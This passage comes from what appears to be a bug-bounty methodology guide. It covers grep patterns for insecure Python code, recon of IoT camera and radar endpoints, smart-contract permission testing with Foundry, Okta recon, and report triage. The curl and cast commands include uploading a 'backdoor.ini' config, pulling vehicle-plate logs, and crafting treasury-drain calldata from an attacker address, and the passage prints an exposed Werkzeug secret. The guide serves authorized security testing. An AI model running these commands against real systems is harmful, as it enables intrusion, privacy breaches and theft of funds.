&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# TOCTOU via tempfile.mktemp() — predictable file names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;tempfile\.mktemp\b&amp;#39;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Zip Slip via zipfile.extractall() without path validation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;zipfile\.(extractall|extract)\b&amp;#39;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check whether there is path-traversal sanitization on the file names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# yaml.load() without SafeLoader — arbitrary deserialization&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;(?&amp;lt;!\.SafeLoader\()yaml\.load\b&amp;#39;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# default yaml.load() uses FullLoader → RCE possible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# eval() / exec() with user input&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#39;(eval|exec)\s*\(&amp;#39;&lt;/span&gt; --include&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;*.py&amp;#34;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Hardcoded passwords&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rP &lt;span style="color:#a6d189"&gt;&amp;#34;(password|passwd|secret|token|api_key)\s*=\s*[&amp;#39;\&amp;#34;][^&amp;#39;\&amp;#34;]{8,}&amp;#34;&lt;/span&gt; --include&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;*.py&amp;#34;&lt;/span&gt; .
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# VULNERABLE CODE — Zip Slip:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;zipfile&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;z &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; zipfile&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;ZipFile(uploaded_file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;z&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;extractall() &lt;span style="color:#737994;font-style:italic"&gt;# No path validation → files can escape the dir&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SECURE CODE (in the same codebase — inconsistency!):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;tarfile&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tar &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; tarfile&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;open(uploaded_file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tar&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;extractall(members&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;safe_extract(tar)) &lt;span style="color:#737994;font-style:italic"&gt;# Has protection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;Why doesn&amp;#39;t zipfile have safe_extract?&amp;#34; → report as an inconsistency&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2626-embeddediot-device-recon" &gt;
&lt;div&gt;
&lt;a href="#2626-embeddediot-device-recon"&gt;
##
&lt;/a&gt;
26.26 Embedded/IoT Device Recon
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Embedded devices (radars, cameras, controllers) exposed to the internet:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Werkzeug Debugger on embedded devices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;werkzeug\|debug&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Exposed SECRET: 5BcAmPHc89fmWT3Tdflg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# EVALEX=false → no console, but stack traces visible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Config files via download endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/config_ini&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Lists configs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/download_config/camera.ini&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/download_config/httpsender.ini&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Config upload (if it accepts new files)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/upload_config/backdoor.ini&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -F &lt;span style="color:#a6d189"&gt;&amp;#34;file=@malicious.ini&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Real-time operational logs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/ritux_logs&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Available dates&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/ritux_log/2026-06-22&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Logs for the day&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Vehicle plates, infractions, timestamps&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Operational calendar&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/datas_afericao&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Calibration dates&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:5000/datas_teste_tarja&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Test dates&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Internal proxy via config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -r &lt;span style="color:#a6d189"&gt;&amp;#34;proxy.php&amp;#34;&lt;/span&gt; config_dump/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → /sistemas/afericao/oficial/imagens_afericoes/proxy.php?url=...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2627-smart-contract-permission-testing-foundrycast" &gt;
&lt;div&gt;
&lt;a href="#2627-smart-contract-permission-testing-foundrycast"&gt;
##
&lt;/a&gt;
26.27 Smart Contract Permission Testing (Foundry/Cast)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;For EVM smart contract auditing:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Gas estimation as a permission oracle&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If cast estimate returns a gas cost → the operation would succeed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it returns a revert reason → blocked (but reveals internal logic)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast estimate TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;setQuorumBps(uint256)&amp;#34;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Scan governance parameters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;quorumBps()(uint256)&amp;#34;&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;votingPeriod()(uint256)&amp;#34;&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;entryFee()(uint256)&amp;#34;&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If quorumBps=0 → any proposal passes without votes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If entryFee=0 → anyone can participate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Test admin functions from an unauthorized address&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast send TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;addCouncilMember(address)&amp;#34;&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$ATTACKER&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --from &lt;span style="color:#f2d5cf"&gt;$ATTACKER&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt; 2&amp;gt;&amp;amp;&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If revert &amp;#34;Ownable: caller is not the owner&amp;#34; → safe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If success → CRITICAL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Enumerate unexecuted proposals&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; 50&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;state&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;state(uint256)(uint8)&amp;#34;&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$state&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;4&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Proposal #&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: Succeeded (executable!)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Drain chain via malicious proposal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast calldata &lt;span style="color:#a6d189"&gt;&amp;#34;executeDrain(address,uint256)&amp;#34;&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$ATTACKER&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;1000000000000000000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If propose() accepts this calldata → can drain the treasury&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2628-okta-specific-recon" &gt;
&lt;div&gt;
&lt;a href="#2628-okta-specific-recon"&gt;
##
&lt;/a&gt;
26.28 Okta-Specific Recon
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. grant_type=none detection (OAuth metadata)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.okta.com/oauth2/default/.well-known/oauth-authorization-server&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;.token_endpoint_auth_methods_supported&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If [&amp;#34;none&amp;#34;] is in the list → public clients can obtain tokens without a secret&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. CSP localhost port mapping (Okta FastPass)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.okta.com/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;content-security-policy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# connect-src http://localhost:8769 http://127.0.0.1:65111&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Reveals the ports of the Okta FastPass local authenticator&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Attack: if malware runs on localhost, it can communicate with these ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. OpenID Configuration discovery&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.okta.com/.well-known/openid-configuration&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;{issuer, auth_endpoint: .authorization_endpoint, token_endpoint: .token_endpoint, grants: .grant_types_supported}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Tenant discovery (find the target&amp;#39;s Okta domain)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check redirect headers in SSO, DNS TXT records, JS bundles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig TXT _okta.TARGET.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://sso.TARGET.com&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;location\|okta&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="27-report--triage-methodology" &gt;
&lt;div&gt;
&lt;a href="#27-report--triage-methodology"&gt;
#
&lt;/a&gt;
27. REPORT &amp;amp; TRIAGE METHODOLOGY
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="271-7-question-gate-before-reporting" &gt;
&lt;div&gt;
&lt;a href="#271-7-question-gate-before-reporting"&gt;
##
&lt;/a&gt;
27.1 7-Question Gate (Before Reporting)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Before writing ANY report, answer these 7 questions:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Question&lt;/th&gt;
&lt;th&gt;If &amp;ldquo;no&amp;rdquo;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Q1&lt;/td&gt;
&lt;td&gt;Can you reproduce with a real request, right now?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q2&lt;/td&gt;
&lt;td&gt;Is the impact on the program&amp;rsquo;s accepted list?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q3&lt;/td&gt;
&lt;td&gt;Is the target in-scope?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q4&lt;/td&gt;
&lt;td&gt;Does it work without privilege the attacker doesn&amp;rsquo;t have?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q5&lt;/td&gt;
&lt;td&gt;Is it not a known/by-design behavior?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q6&lt;/td&gt;
&lt;td&gt;Can you prove REAL impact (data), not just &amp;ldquo;technically possible&amp;rdquo;?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;DOWNGRADE&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q7&lt;/td&gt;
&lt;td&gt;Is it not on the never-submit list?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="272-severity-simplified-cvss-31" &gt;
&lt;div&gt;
&lt;a href="#272-severity-simplified-cvss-31"&gt;
##
&lt;/a&gt;
27.2 Severity (Simplified CVSS 3.1)
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;CVSS&lt;/th&gt;
&lt;th&gt;Examples&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Critical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;9.0-10.0&lt;/td&gt;
&lt;td&gt;RCE, SQLi with dump, CRUD without auth on sensitive data, Public Firebase with PII&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;High&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;7.0-8.9&lt;/td&gt;
&lt;td&gt;Auth bypass, JWT forgery, DELETE without auth, Stored XSS, CORS+creds, DMARC p=none&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Medium&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;4.0-6.9&lt;/td&gt;
&lt;td&gt;CORS reflection without creds, info disclosure (emails, versions), reflected XSS, source maps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Low&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;0.1-3.9&lt;/td&gt;
&lt;td&gt;Missing headers, server version disclosure, path disclosure, missing rate limiting&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="273-title-formula" &gt;
&lt;div&gt;
&lt;a href="#273-title-formula"&gt;
##
&lt;/a&gt;
27.3 Title Formula
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[Vulnerability Type] in [Component] allows [Impact] at [Target]
